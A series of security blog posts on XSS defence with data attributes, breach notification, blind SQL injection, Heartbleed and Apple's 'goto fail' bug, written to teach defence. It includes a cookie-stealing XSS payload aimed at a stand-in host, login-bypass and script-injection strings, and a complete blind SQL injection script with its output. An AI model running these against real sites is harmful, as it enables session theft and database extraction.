General Security

HTML data attributes – stop my XSS

First, a disclaimer for the TL;DR crowd – data attributes alone will not stop all XSS, mine or anyone else’s. You have to apply them correctly, and use them properly.

However, I think you’ll agree with me that it’s a great way to store and reference data in a page, and that if you only handle user data in correctly encoded data attributes, you have a greatly-reduced exposure to XSS, and can actually reduce your exposure to zero.

Next, a reminder about my theory of XSS – that there are four parts to an XSS attack – Injection, Escape, Attack and Cleanup. Injection is necessary and therefore can’t be blocked, Attacks are too varied to block, and Cleanup isn’t always required for an attack to succeed. Clearly, then, the Escape is the part of the XSS attack quartet that you can block.

Now let’s set up the code we’re trying to protect – say we want to have a user-input value accessible in JavaScript code. Maybe we’re passing a search query to Omniture (by far the majority of JavaScript Injection XSS issues I find). Here’s how it often looks:

<script>
s.prop1="mysite.com";
s.prop2="SEARCH-STRING";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//—>
</script>

Let’s suppose that “SEARCH-STRING” above is the string for which I searched.

I can inject my code as a search for:

"-window.open("//badpage.com/"+document.cookie,"_top")-"

The second line then becomes:

s.prop2=""-window.open("//badpage.com/"+document.cookie,"_top")-"";

Yes, I know you can’t subtract two strings, but JavaScript doesn’t know that until it’s evaluated the window.open() function, and by then it’s too late, because it’s already executed the bad thing. A more sensible language would have thrown an error at compile time, but this is just another reason for security guys to hate dynamic languages.

How do data attributes fix this?

A data attribute is an attribute in an HTML tag, whose name begins with the word “data” and a hypen.

These data attributes can be on any HTML tag, but usually they sit in a tag which they describe, or which is at least very close to the portion of the page they describe.

Data attributes on table cells can be associated to the data within that cell, data attributes on a body tag can be associated to the whole page, or the context in which the page is loaded.

Because data attributes are HTML attributes, quoting their contents is easy. In fact, there’s really only a couple of quoting rules needed to consider.

  1. The attribute’s value must be quoted, either in double-quote or single-quote characters, but usually in double quotes because of XHTML
  2. Any ampersand (“&”) characters need to be HTML encoded to “&amp;”.
  3. Quote characters occurring in the value must be HTML encoded to “&quot;

Rules 2 & 3 can simply be replaced with “HTML encode everything in the value other than alphanumerics” before applying rule 1, and if that’s easier, do that.

Sidebar – why those rules?

HTML parses attribute value strings very simply – look for the first non-space character after the “=” sign, which is either a quote or not a quote. If it’s a quote, find another one of the same kind, HTML-decode what’s in between them, and that’s the attribute’s value. If the first non-space after the equal sign is not a quote, the value ends at the next space character.
Contemplate how these are parsed, and then see if you’re right:

  • <a onclick="prompt("1")">&lt;a onclick="prompt("1")"&gt;</a>

  • <a onclick = "prompt( 1 )">&lt;a onclick = "prompt( 1 )"&gt;</a>

  • <a onclick= prompt( 1 ) >&lt;a onclick= prompt( 1 ) &gt;</a>

  • <a onclick= prompt(" 1 ") >&lt;a onclick= prompt(" 1 ") &gt;</a>

  • <a onclick= prompt( "1" ) >&lt;a onclick= prompt( "1" ) &gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#9;"prompt( 1 )"&gt;</a>

  • <a onclick= "prompt( 1 )">&lt;a onclick=&amp;#32;"prompt( 1 )"&gt;</a>

  • <a onclick= thing=1;prompt(thing)>&lt;a onclick= thing=1;prompt(thing)&gt;</a>

  • <a onclick="prompt(\"1\")">&lt;a onclick="prompt(\"1\")"&gt;</a>

Try each of them (they aren’t live in this document – you should paste them into an HTML file and open it in your browser), see which ones prompt when you click on them. Play with some other formats of quoting. Did any of these surprise you as to how the browser parsed them?

Here’s how they look in the Debugger in Internet Explorer 11:

image

Uh… That’s not right, particularly line 8. Clearly syntax colouring in IE11’s Debugger window needs some work.

OK, let’s try the DOM Explorer:

image

Much better – note how the DOM explorer reorders some of these attributes, because it’s reading them out of the Document Object Model (DOM) in the browser as it is rendered, rather than as it exists in the source file. Now you can see which are interpreted as attribute names (in red) and which are the attribute values (in blue).

Other browsers have similar capabilities, of course – use whichever one works for you.

Hopefully this demonstrates why you need to follow the rules of 1) quoting with double quotes, 2) encoding any ampersand, and 3) encoding any double quotes.

Back to the data-attributes

So, now if I use those data-attributes, my HTML includes a number of tags, each with one or more attributes named “data-something-or-other”.

Accessing these tags from basic JavaScript is easy. You first need to get access to the DOM object representing the tag – if you’re operating inside of an event handler, you can simply use the “this” object to refer to the object on which the event is handled (so you may want to attach the data-* attributes to the object which triggers the handler).

If you’re not inside of an event handler, or you want to get access to another tag, you should find the object representing the tag in some other way – usually document.getElementById(…)

Once you have the object, you can query an attribute with the function getAttribute(…) – the single argument is the name of the attribute, and what’s returned is a string – and any HTML encoding in the data-attribute will have been decoded once.

Other frameworks have ways of accessing this data attribute more easily – for instance, JQuery has a “.data(…)” function which will fetch a data attribute’s value.

How this stops my XSS

I’ve noted before that stopping XSS is a “simple” matter of finding where you allow injection, and preventing, in a logical manner, every possible escape from the context into which you inject that data, so that it cannot possibly become code.

If all the data you inject into a page is injected as HTML attribute values or HTML text, you only need to know one function – HTML Encode – and whether you need to surround your value with quotes (in a data-attribute) or not (in HTML text). That’s a lot easier than trying to understand multiple injection contexts each with their own encoding function. It’s a lot easier to protect the inclusion of arbitrary user data in your web pages, and you’ll also gain the advantage of not having multiple injection points for the same piece of data. In short, your web page becomes more object-oriented, which isn’t a bad thing at all.

One final gotcha

You can still kick your own arse.

When converting user input from the string you get from getAttribute to a numeric value, what function are you going to use?

Please don’t say “eval”.

Eval is evil. Just like innerHtml and document.write, its use is an invitation to Cross-Site Scripting.

Use parseFloat() and parseInt(), because they won’t evaluate function calls or other nefarious components in your strings.

So, now I’m hoping your Omniture script looks like this:

<div id="myDataDiv" data-search-term="SEARCH-STRING"></div>
<script>
s.prop1="mysite.com";
s.prop2=document.getElementById("myDataDiv").getAttribute("data-search-term");
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
s_code=s.t();
if(s_code)
document.write(s_code)//—>
</script>

You didn’t forget to HTML encode your SEARCH-STRING, or at least its quotes and ampersands, did you?

P.S. Omniture doesn’t cause XSS, but many people implementing its required calls do.

Lessons to learn already from Premera – 1. Notification

Last weekend, along with countless employees and ex-employees of Microsoft, Amazon, Expedia, and Premera itself, I received a breach notification signed by Premera’s President & CEO, Jeffrey Roe.

Here’s a few things I think can already be learned from this letter and the available public information:

Don’t claim “sophisticated”

Whenever I see the phrase “sophisticated cyberattack”, not only am I turned off by the meaningless prefix “cyber”, which seems to serve only to “baffle them with bullshit”, but I’m also convinced that the author is trying to convince me that, hey, this attack was just too amazing and science-fictiony to do anything to stop.

All that does is push me in the other direction – to assume that the attack was relatively simple, and should have been prevented and/or noticed.

Granted, my experience is in Information Security, and so I’m always fairly convinced that it’ll be the simple attacks, not the complex and difficult ones, that will be the most successful against any site I’m trying to protect. It’s a little pessimistic, but it’s been proven right time and again.

So, never say that an attack is “sophisticated” unless you really mean that the attack was way beyond what could have been reasonably imagined. You don’t have to say the attackers used simple methods to get in because your team are idiots, because that’s unlikely to be entirely true, either. Just don’t make it sound like it’s not your fault. And don’t make that your opening gambit, either – this was the very first sentence in Premera’s notification.

Don’t say “may” / “might”, say “was”

“some of your personal information may have been accessed”

Again, this phrasing simply makes me think “these guys have no idea what was accessed”, which really doesn’t inspire confidence.

Instead, you should say “the attackers had access to all our information, including your personal and medical data”. Then acknowledge that you don’t have tracking on what information was exported, so you have to act as if it all was.

Say “sorry we allowed your data to be lost”

The worst apologies on record all contain some variation of “I’m sorry you’re upset”, or “I’m sorry you took offence”.

Premera’s version of this is “We … regret the concern it may cause”. So, not even “sorry”. And to the extent that it’s an apology at all, it is that we, current and past customers, were “concerned”.

Parenthetical abbreviations mean this was written by a lawyer

Premera Blue Cross (“Premera”) …

… Information Technology (IT) systems

As if the lack of apology didn’t already tip us off that this document was prepared by a lawyer, the parenthetical creation of abbreviations to be used later on makes it completely clear.

If the letter had sounded more human, it would have been easier to receive as something other than a legal arse-covering exercise.

Speed is important

The letter acknowledges that the issue was discovered on January 29, 2015, and the letter is dated March 17, 2015. That’s nearly two months. And nearly a year since the attackers got in. That’s assuming that you’ve truly figured out the extent of the “sophisticated cyberattack”.

Actually, that’s pretty fast for security breach disclosure, but it still gives the impression to customers that you aren’t letting them know in enough time to protect themselves.

The reason given for this delay is that Premera wanted to ensure that their systems were safe before letting other attackers know about the issue – but it’s generally a fallacy to assume that attackers don’t know about your vulnerabilities. Premera, and the health insurance industry, do a great job of sharing security information with other health insurance providers – but the attackers do an even better job of sharing information about vulnerable systems and tools.

Which leads us to…

Preparation is key

If your company doesn’t have a prepared breach disclosure letter, approved by public relations, the security team and your lawyers, it’s going to take you at least a week, probably two, to put one together. And you’ll have missed something, because you’re preparing it in a rush, in a panic, and in a haze while you’re angry and scared about having been attacked.

Your prepared letter won’t be complete, and won’t be entirely applicable to whatever breach finally comes along and bites you, but it’ll put you that much closer to being ready to handle and communicate that breach. You’ll still need to review it and argue between Security, Legal and PR teams.

Have a plan for this review process, and know the triggers that will start it. Maybe even test the process once in a while.

If you believe that breaches could require a credit notification or ID tracking protection, negotiate this ahead of time, so that this will not slow you down in your announcement. Or write your notification letter with the intent of providing this information at a later time.

Finally, because your notification letter will miss something, make sure it includes the ability to update your customers – link to an FAQ online that can be updated, and provide a call-in number for people to ask questions of an informed team of responders.

More to come

There’s always more information coming out about this vulnerability, and I plan to blog a little more about it later.

Let me know in particular if there’s something you’d like me to cover on this topic.

I’m hacking your website with 15-year-old technology

But then, I’m hacking your website because of a 15-year-old flaw.

It’s been noted for some time that I love playing with XSS, simply because it’s so widespread, and because it’s an indication of the likely security stance of the rest of the website.

But if XSS is important because it’s widely spread, it’s got a relatively low impact.

Slightly less widely spread, but often the cause of far greater damage, is SQL injection.

I’ll talk some more later about how SQL injection happens, but for now a quick demonstration of the power of SQL injection.

What it isn’t – the login page

Every demonstration of SQL injection I’ve ever seen includes this example:

sqlCommandString = "SELECT userid FROM users WHERE userid='" + inputID + "' AND password='" + inputPass + "'"

And of course, the trick here is to supply the user ID “admin” and the password “' OR 1='1”.

Sure, IF you have that code in your app, that will let the user in as admin.

But then, IF you have that code in your app, you have many bigger problems than SQL injection – because your user database contains unprotected passwords, and a leak will automatically tell the world how poor your security is, and always has been.

More likely, if you have SQL injection in the logon code at all, is that you will have code like this:

sqlCommandString = "SELECT userid, password FROM users WHERE userid='" + inputID + "'"
… execute sqlCommandString …
… extract salt …
… hash incoming password …
… compare salted hash of incoming password against stored password …

Again, if you were to have designed poorly, you might allow for multiple user records to come back (suppose, say, you allow the user to reuse old passwords, or old hashing algorithms), and you accept the first account with the right password. In that case, yes, an attacker could hack the login page with a common password, and the user ID “' OR userid LIKE '%” – but then the attacker would have to know the field was called userid, and they’re only going to get the first account in your database that has that password.

Doubtless there are many login pages which are vulnerable to SQL injection attacks like this, but they are relatively uncommon where developers have some experience or skill.

So if not on the login page, where do we see SQLi?

Where do you use a SQL-like database?

Anywhere there’s a table of data to be queried, whether it’s a dictionary of words, or a list of popular kitchen repair technicians, etc, etc.

Imagine I’ve got a dictionary searching page, weblexicon.example (that doesn’t exist, nor does weblexicon.com). Its main page offers me a field to provide a word, for which I want to see the definition.

If I give it a real word, it tells me the definition(s).

image

If I give it a non-existent word, it apologises for being unable to help me.

image

Seems like a database search is used here. Let’s see if it’s exploitable, by asking for “example’” – that’s “example” with an extra single quote at the end.

image

That’s pretty cool – we can tell now that the server is passing our information off to a MySQL server. Those things that look like double-quotes around the word ‘example’ are in fact two single-quotes. A bit confusing, but it helps to understand what’s going on here.

So, let’s feed the web lexicon a value that might exploit it. Sadly, it doesn’t accept multiple commands, and gives the “You have an error in your SQL syntax” message when I try it.

Worse still, for some reason I can’t use the “UNION” or “JOIN” operators to get more data than I’m allowed. This seems to be relatively common when there are extra parentheses, or other things we haven’t quite guessed about the command.

I’m blind!

That means we’re stuck with Blind SQL injection. With a blind SQL injection, or Blind SQLi, you can generally see whether a value is true or false, by the response you get back. Remember our comparison of a word that does exist and a word that doesn’t? Let’s try that in a query to look up a true / false value:

image

image

So now, we can ask true / false questions against the database.

Seems rather limiting.

Let’s say we’re looking to see if the MySQL server is running a particular vulnerable version – we could ask for “example’ and @@version=’1.2.3.4” – a true response would give us the hint that we can exploit that vulnerability.

LIKE my ‘sploit

But the SQL language has so many other options. We can say “does your version number begin with a ‘4’”

image

Or 5.

image

A bit more exciting, but still pedestrian.

What if I want to find out what the currently executing statement looks like? I could ask “is it an ‘a’? a ‘b’? a ‘c’?” and so on, but that is too slow.

Instead, I could ask for each bit of the characters, and that’s certainly a good strategy – but the one I chose is to simply do a binary search, which is computationally equivalent.

What language, that’s the question…

A fifteen-year-old vulnerability (SQL injection is older than that, but I couldn’t do the maths) deserves the same age of language to write my attack in.

So I chose batch file and VBScript (OK, they’re both older than 15). Batch files can’t actually download a web page, so that’s the part I wrote in VBScript.

And the fun thing to dump would be all of the table names. That way, we can see what we have to play with.

So here you go, a simple batch script to do Blind Boolean SQL injection to list all the tables in the system.

setlocal ENABLEDELAYEDEXPANSION
setlocal ENABLEEXTENSIONS
echo wscript.echo chr(wscript.arguments(0)) > charout.vbs
set last=
set stem=%last%
set lasti=0
set out=sqli.out
:looping
@set found=_
:looping2
@cscript htget.vbs //nologo http://weblexicon.example/definition.php?query=example'+and+((select+table_name+from+information_schema.tables+limit+1+offset+%lasti%)+like+'%stem%%%')+and+1='1 >%out%
@findstr /c:"1. [n" %out%> nul || (
  set last2=%stem:\_=_%
  if "!last!" lss "!last2!" (
    set last=!last2!
    echo !last!
    set /a lasti=!lasti!+1
    set stem=
rem pause
    goto :looping
  )
  rem pause
  set stem=!stem:~0,-1!
  title %stem%.
  goto :looping2
)
@set nchars=1
@set nqueries=0
:charloop
@set lower=32
@set higher=127
:check
@set /a mid = (%lower% + %higher%) / 2
@cscript htget.vbs //nologo http://weblexicon.example/definition.php?query=example'+and+(ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+%lasti%)+from+%nchars%+for+1))+between+%lower%+and+%mid%)+and+1='1 >%out%
@set /a nqueries=%nqueries%+1
@findstr /c:"1. [n" %out%> nul && (
    set higher=%mid%
    set /a mid=%lower%-1
)
@set /a lower=%mid%+1
@if %lower% EQU 127 goto donecheck
@if %lower% NEQ %higher% goto check
@if %lower% EQU 32 @(set found= )
@for /f %%a in ('cscript charout.vbs //nologo %lower%') do @set found=%%a
@rem pause
@set stem=%stem%%found%
@rem echo . | set /p foo=%found: =+%
@title !stem!
@set /a nchars=%nchars%+1
@goto charloop
:donecheck
@echo %lasti%: %stem%
@rem (%nqueries% queries)
@rem pause
@set /a lasti=!lasti!+1
@set stem=
@goto :looping

And the output (demonstrating that there are still some concurrency issues to take care of):

0: CHARACTER_SETS
1: COLLATIONS
2: COLLATION_CHARACTER_SET_APPLICABILITY
3: COLUMNS
4: COLUMN_PRIVILEGES
5: ENGINES
6: EVENTS
7: F
8: GLOBAL_SgATUS
9: GLOBAL_VARIABLES
10: KEY_COLUMN_USAGE
11: PARAMETERS
12: PARTITIONS
13: PLUGINS
14: PROCESSLIST
15: PROFILING
16: REFERENTIAL_CONSTRAINTS
17: ROUTINES
18: SCHEMATA
19: SCHEMA_PRIVILEGES
20: SESSION_STATUS
21: SESSION_VARIABLES
22: STATISTICS
23: TABLES
24: TABLESPACES
25: TABLE_CONSTRAINTS
26: TABLE_PRIVILEGES
27: TRIGGERS
28: USER_PRIVILEGES
29: VIEWS
30: INNODB_BUFFER_PAGE
31: INNODB_TRX
32: INNODB_BUFFER_POOL_S
33: INNODB_LOCK_WAITS
34: INNODB_CMPMEM
35: INNODB_CMP
36: INNODB_LOCKS
37: INNODB_CMPMEM_RESET
38: INNODB_CMP_RESET
39: INNODB_BUFFER_PAGE_
40: alternatives
41: quotes
42: words

60 lines? What, that’s it?

Yes, that’s all it takes.

If you’re a developer of a web app which uses a relational database back-end, take note – it’s exactly this easy to dump your database contents. A few changes to the batch file, and I’m dumping column names and types, then individual items from tables.

And that’s all assuming I’m stuck with a blind SQL injection.

The weblexicon site lists table contents as its definitions, so in theory I should be able to use a UNION or a JOIN to add data from other tables into the definitions it displays. It’s made easier by the fact that I can also access the command I’m injecting into, by virtue of MySQL including that in a process table.

Note that if I’m attacking a different site with a different injection point, I need to make two changes to my batch script, and I’m away. Granted, this isn’t exactly sqlmap.py, but then again, sqlmap.py doesn’t always find or exploit all the vulns that you have available.

Summary

The takeaways today:

  1. SQLi is a high damage attack – an attacker can probably steal ALL your data from your databases, not just the data exposed on a page, and they may be able to modify ALL your data.
  2. SQLi is easy to find – there are lists of thousands of vulnerable websites available for anyone to view. And that’s without looking on the “Dark Web”. Also, any data-handling web site is a great target to try.
  3. SQLi is easy to exploit – a few lines of an archaic language are all it takes.
  4. SQLi is easy to fix. Parameterised queries, input validation, access control and least-privilege combine (don’t use just one!) to protect your site.

Disclaimer

The code in this article is for demonstration purposes – I’m not going to explain how it works, although it is very simple. The only point of including it is to show that a small amount of code can be the cause of a huge extraction of your site’s data, but can be prevented by a small change.

Don’t use this code to do bad things. Don’t use other code to do bad things. Bad people are doing bad things with code like this (and better) already. Do good things with this code, and keep those bad people out.

Heartbleed–musings while it’s still (nearly) topical

Hopefully, you’ll all know by now what Heartbleed is about. It’s not a virus, it’s a bug in a new feature that was added to a version of OpenSSL, wasn’t very well checked before making it part of the standard build, and which has for the last couple of years meant that any vulnerable system can have its running memory leached by an attacker who can connect to it. I have a number of approaches to make to this, which I haven’t seen elsewhere:

Behavioural Changes to Prevent “the next” Heartbleed

You know me, I’m all about the “defence against the dark arts” side of information security – it’s fun to attack systems, but it’s more interesting to be able to find ways to defend.

Here are some of my suggestions about programming practices that would help:

  1. Don’t adopt new features into established protocols without a clear need to do so. Why was enabling the Heartbeat extension a necessary thing to foist on everyone? Was it a MUST in the RFC? Heartbeat, “keep-alive” and similar measures are a waste of time on most of the Internet’s traffic, either because the application layer already keeps up a constant communication, or because it’s easy to recover and restart. Think very carefully before adopting as mandatory a new feature into a security related protocol.
  2. This was not a security coding bug, it was a secure coding bug, but in a critical piece of security code. Secure code practices in general should be a part of all developers’ training and process, much like hand-washing is important for doctors whether they’re performing surgery or checking your throat for swelling. In this case, the code submitted should have tripped a “this looks odd” sense in the reviewer, combined with its paucity of comments and self-explanation (but then, OpenSSL is by and large that way anyway).
  3. Check lengths of buffers. When data is structured, or wrapped in layers, like SSL records are, transform it back into structures and verify at each layer. I’m actually trying to say write object-oriented code to represent objects – whether the language is object-oriented or not. [It’s a matter of some pride for me that I reviewed some of the Fortran code I wrote as a student back in the mid eighties, and I can see object-orientedness trying to squeeze its way out.]
  4. Pay someone to review code. Make it their job, pay them well to cover the boredom, and hold them responsible for reviewing it properly. If it matters enough to be widely used, it matters enough to be supported.
  5. Stop using magic numbers. No “1 + 2 + 16” – use sizeof, even when it’s bleedin’ obvious.
  6. Unit tests. And then tests written by a QA guy, who’s trying to make it fail.

There’s just a few ideas off the top of my head. It’s true that this was a HARD bug to find in automated code review, or even with manual code review (though item 2 above tells you that I think the code looked perverse enough for a reviewer to demand better, cleaner code that could at least be read).

National Security reaction – inappropriate!

Clearly, from the number of sites (in all countries) affected negatively by this flaw, from the massive hysteria that has resulted, as well as the significant thefts disclosed to date, this bug was a National Security issue.

So, how does the US government respond to the allegations going around that they had knowledge of this bug for a long time?

By denying the allegations? By asserting they have a mandate to protect?

No, by reminding us that they’ll protect US (and world) industries UNLESS there’s a benefit to spying in withholding and exploiting the bug.

There was even a quote in the New York Times saying:

“You are not going to see the Chinese give up on ‘zero days’ just because we do.”

No, you’re going to see “the Chinese” [we always have to have an identifiable bogeyman] give up on zero days when our response to finding them is to PATCH THEM, not hold them in reserve to exploit at our leisure.

Specifically, if we patch zero days when we find them, those weapons disappear from our adversaries’ arsenals.

If we hold on to zero days when we find them, those weapons are a part of our adversaries’ arsenals (because the bad guys share better than the good guys).

National Security officials should recognise that in cyberwar – which consists essentially of people sending postcards saying “please hit yourself” to one another, and then expressing satisfaction when the recipient does so – you win by defending far more than by attacking.

Many eyeballs review is surprisingly incomplete

It’s often been stated that “many eyeballs” review open source code, and as a result, the reviews are of implicitly better quality than closed source code.

Clearly, OpenSSL is an important and widely used piece of security software, and yet this change was, by all accounts, reviewed by three people before being published and widely deployed. Only one of those people works full time for OpenSSL, and another was the author of the feature in question.

There are not “many” eyeballs working on this review. Closed source will often substitute paid eyeballs for quantity of eyeballs, and as a result will often achieve better reviews.

Remember, it’s the quality of the review that counts, and not whether the source is closed or open.

Closed source that is thoroughly reviewed by experts is better than open source that’s barely reviewed at all.

Finally, in case you’re not yet tired of Heartbleed analogies

Yes, XKCD delivered perhaps the most widely used analogy.

But here’s the one I use to describe it to family members.

Imagine you’re manning a reception desk.

Calls come in, you write down messages, and you send them off.

At some point, you realise that this is a waste of paper, so you start writing your messages on a whiteboard.

Wiping the whole whiteboard for each message is a waste of effort, so you only wipe out enough space to write each incoming message.

Some messages are long, some are short.

One day, you are asked to read a message back to the person who leaves it, just after you wrote it.

And to make it easy, they tell you how long their message is.

If someone gave you a six letter message, and asked you to read all six hundred letters of it back to them, you’d be upset, because that’s not how many letters they gave you.

Computers aren’t so smart, they are just really fast idiots.

The computer doesn’t get surprised that you sent six characters and ask for six hundred back, so it reads off the entire whiteboard, containing bits and pieces of every message you’ve had sent through you.

And because most messages are small, and only some are large, there’s almost an entire message in each response.

Microsoft’s (new!) SDL Threat Modeling Tool 2014

Amid almost no fanfare whatsoever, Microsoft yesterday released a tool I’ve been begging them for over the last five or six years.

[This is not unusual for me to be so persistently demanding, as I’ve found it’s often the only way to get what I want.]

As you’ve guessed from the title, this tool is the “SDL Threat Modeling Tool 2014”. Sexy name, indeed.

Don’t they already have one of those?

Well, yeah, kind of. There’s the TAM Threat Analysis & Modeling Tool, which is looking quite creaky with age now, and which I never found to be particularly usable (though some people have had success with it, so I’m not completely dismissive of it). Then there’s the previous versions of the SDL Threat Modeling Tool.

These have had their uses – and certainly it’s noticeable that when I work with a team of developers, one of whom has worked at Microsoft, it’s encouraging to ask “show me your threat model” and have them turn around with something useful to dissect.

So what’s wrong with the current crop of TM tools?

In a word, Cost.

Threat modeling tools from other than Microsoft are pretty pricey. If you’re a government or military contractor, they’re probably great and wonderful. Otherwise, you’ll probably draw your DFDs in PowerPoint (yes, that’s one of the easier DFD tools available to most of you!), and write your threat models in Word.

Unless, of course, you download and use the Microsoft SDL Threat Modeling Tool, which has always been free.

So where’s the cost?

The SDL TM tool itself was free, but it had a rather significant dependency.

Visio.

Visio is not cheap.

As a result, those of us who championed threat modeling at all in our enterprises found it remarkably difficult to get approval to use a free tool that depended on an expensive tool that nobody was going to use.

What’s changed today?

With the release of Microsoft SDL Threat Modeling Tool 2014, Microsoft has finally delivered a tool that allows for the creation of moderately complex DFDs (you don’t want more complex DFDs than that, anyway!), and a threat library-based analysis of those DFDs, without making it depend on anything more expensive or niche than Windows and .NET. [So, essentially, just Windows.]

Yes, that means no Visio required.

Is there anything else good about this new tool?

A quick bullet list of some of the features you’ll like, besides the lack of Visio requirement:

  • Imports from the previous SDL Threat Modeling Tool (version 3), so you don’t have to re-work
  • Multiple diagrams per model, for different levels of DFD
  • Analysis is per-interaction, rather than per-object [scary, but functionally equivalent to per-object]
  • The file format is XML, and is reasonably resilient to modification
  • Objects and data flows can represent multiple types, defined in an XML KnowledgeBase
  • These types can have customised data elements, also defined in XML
  • The rules about what threats to generate are also defined in XML
  • [These together mean an enterprise can create a library of threats for their commonly-used components]
  • Trust boundaries can be lines, or boxes (demonstrating that trust boundaries surround regions of objects)
  • Currently supported by a development team who are responsive to feature requests

Call to Action?

Yes, every good blog post has to have one of these, doesn’t it? What am I asking you to do with this information?

Download the tool. Try it out on a relatively simple project, and see how easy it is to generate a few threats.

Once you’re familiar with the tool, visit the KnowledgeBase directory in the tool’s installation folder, and read the XML files that were used to create your threats.

Add an object type.

Add a data flow type.

Add custom properties that describe your custom types.

Use those custom properties in a rule you create to generate one of the common threats in your environment.

Work with others in your security and development teams to generate a good threat library, and embody it in XML rules that you can distribute to other users of the threat modeling tool in your enterprise.

Document and mitigate threats. Measure how successful you are, at predicting threats, at reducing risk, and at impacting security earlier in your development cycle.

Then do a better job on each project.

Ways you haven’t stopped my XSS, Number 2–backslash doesn’t encode quotes in HTML attributes

Last time in this series, I posted an example where XSS was possible because a site’s developer is unaware of the implications that his JavaScript is hosted inside of HTML.

This is sort of the opposite of that, noting that time-worn JavaScript (and C, Java, C++, C#, etc) methods don’t always apply to HTML.

The XSS mantra for HTML attributes

I teach that XSS is prevented absolutely by appropriate contextual encoding of user data on its way out of your application and into the page.

The context dictates what encoding you need, whether the context is “JavaScript string”, “JavaScript code”, “HTML attribute”, “HTML content”, “URL”, “CSS expression”, etc, etc.

In the case of HTML attributes, it’s actually fairly simple.

Unless you are putting a URL into an attribute, there are three simple rules:

  1. Every attribute’s value must be quoted, whether with single quotes or double quotes.
  2. If the quote you use appears in the attribute value, it must be encoded.
  3. You must encode any characters which could confuse the encoding. [Encode the encoding characters]

Seems easy, right?

This is all kinds of good, except when you run into a site where the developer hasn’t really thought about their encoding very well.

You see, HTML attribute values are encoded using HTML encoding, not C++ encoding.

To HTML, the back-slash has no particular meaning.

I see this all the time – I want to inject script, but the site only lets me put user data into an attribute value:

<meta name="keywords" content="Wot I searched for">

That’s lovely. I’d like to put "><script>prompt(1)</script> in there as a proof of concept, so that it reads:

<meta name="keywords" content=""><script>prompt(1)</script>">

The dev sees this, and cuts me off, by preventing me from ending the quoted string that makes up the value of the content attribute:

<meta name="keywords" content="\"><script>prompt(1)</script>">

Nice try, Charlie, but that back-slash, it’s just a back-slash. It means nothing to HTML, and so my quote character still ends the string. My prompt still executes, and you have to explain why your ‘fix’ got broken as soon as you released it.

Oh, if only you had chosen the correct HTML encoding, and replaced my quote with “&quot;” [and therefore, also replace every “&” in my query with “&amp;”], we’d be happy.

And this, my friends, is why every time you implement a mitigation, you must test it. And why you follow the security team’s guidance.

Exercise for the reader – how do you exploit this example if I don’t encode the quotes, but I do strip out angle brackets?

Apple’s “goto fail” SSL issue–how do you avoid it?

Context – Apple releases security fix; everyone sees what they fixed

 

Last week, Apple released a security update for iOS, indicating that the vulnerability being fixed is one that allows SSL / TLS connections to continue even though the server should not be authenticated. This is how they described it:

Impact: An attacker with a privileged network position may capture or modify data in sessions protected by SSL/TLS

Description: Secure Transport failed to validate the authenticity of the connection. This issue was addressed by restoring missing validation steps.

Secure Transport is their library for handling SSL / TLS, meaning that the bulk of applications written for these platforms would not adequately validate the authenticity of servers to which they are connected.

Ignore “An attacker with a privileged network position” – this is the very definition of a Man-in-the-Middle (MITM) attacker, and whereas we used to be more blasé about this in the past, when networking was done with wires, now that much of our use is wireless (possibly ALL in the case of iOS), the MITM attacker can easily insert themselves in the privileged position on the network.

The other reason to ignore that terminology is that SSL / TLS takes as its core assumption that it is protecting against exactly such a MITM. By using SSL / TLS in your service, you are noting that there is a significant risk that an attacker has assumed just such a privileged network position.

Also note that “failed to validate the authenticity of the connection” means “allowed the attacker to attack you through an encrypted channel which you believed to be secure”. If the attacker can force your authentication to incorrectly succeed, you believe you are talking to the right server, and you open an encrypted channel to the attacker. That attacker can then open an encrypted channel to the server to which you meant to connect, and echo your information straight on to the server, so you get the same behaviour you expect, but the attacker can see everything that goes on between you and your server, and modify whatever parts of that communication they choose.

So this lack of authentication is essentially a complete failure of your secure connection.

As always happens when a patch is released, within hours (minutes?) of the release, the patch has been reverse engineered, and others are offering their description of the changes made, and how they might have come about.

In this case, the reverse engineering was made easier by the availability of open source copies of the source code in use. Note that this is not an intimation that open source is, in this case, any less secure than closed source, because the patches can be reverse engineered quickly – but it does give us a better insight into exactly the code as it’s seen by Apple’s developers.

Here’s the code:

    if ((err = ReadyHash(&SSLHashSHA1, &hashCtx)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &clientRandom)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
        goto fail;
        goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;

Yes, that’s a second “goto fail”, which means that the last “if” never gets called, and the failure case is always executed. Because of the condition before it, however, the ‘fail’ label gets executed with ‘err’ set to 0.

Initial reaction – lots of haha, and suggestions of finger pointing

So, of course, the Internet being what it is, the first reaction is to laugh at the clowns who made such a simple mistake, that looks so obvious.

T-shirts are printed with “goto fail; goto fail;” on them. Nearly 200 have been sold already (not for me – I don’t generally wear black t-shirts).

But really, these are smart guys – “be smarter” is not the answer

This is SSL code. You don’t get let loose on SSL code unless you’re pretty smart to begin with. You don’t get to work as a developer at Apple on SSL code unless you’re very smart.

Clearly “be smart” is already in evidence.

There is a possibility that this is too much in evidence – that the arrogance of those with experience and a track record may have led these guys to avoid some standard protective measures. The evidence certainly fits that view, but then many developers start with that perspective anyway, so in the spirit of working with the developers you have, rather than the ones you theorise might be possible, let’s see how to address this issue long term:

Here’s my suggested answers – what are yours?

Enforce indentation in your IDE / check-in process

OK, so it’s considered macho to not rely on an IDE. I’ve never understood that. It’s rather like saying how much you prefer pounding nails in with your bare fists, because it demonstrates how much more of a man you are than the guy with a hammer. It doesn’t make sense when you compare how fast the job gets done, or the silly and obvious errors that turn up clearly when the IDE handles your indenting, colouring, and style for you.

Yes, colouring. I know, colour-blind people exist – and those people should adjust the colours in the IDE so that they make sense. Even a colour-blind person can get shade information to help them. I know syntax colouring often helps me spot when an XSS injection is just about ready to work, when I would otherwise have missed it in all the surrounding garbage of HTML code. The same is true when building code, you can spot when keywords are being interpreted as values, when string delimiters are accidentally unescaped, etc.

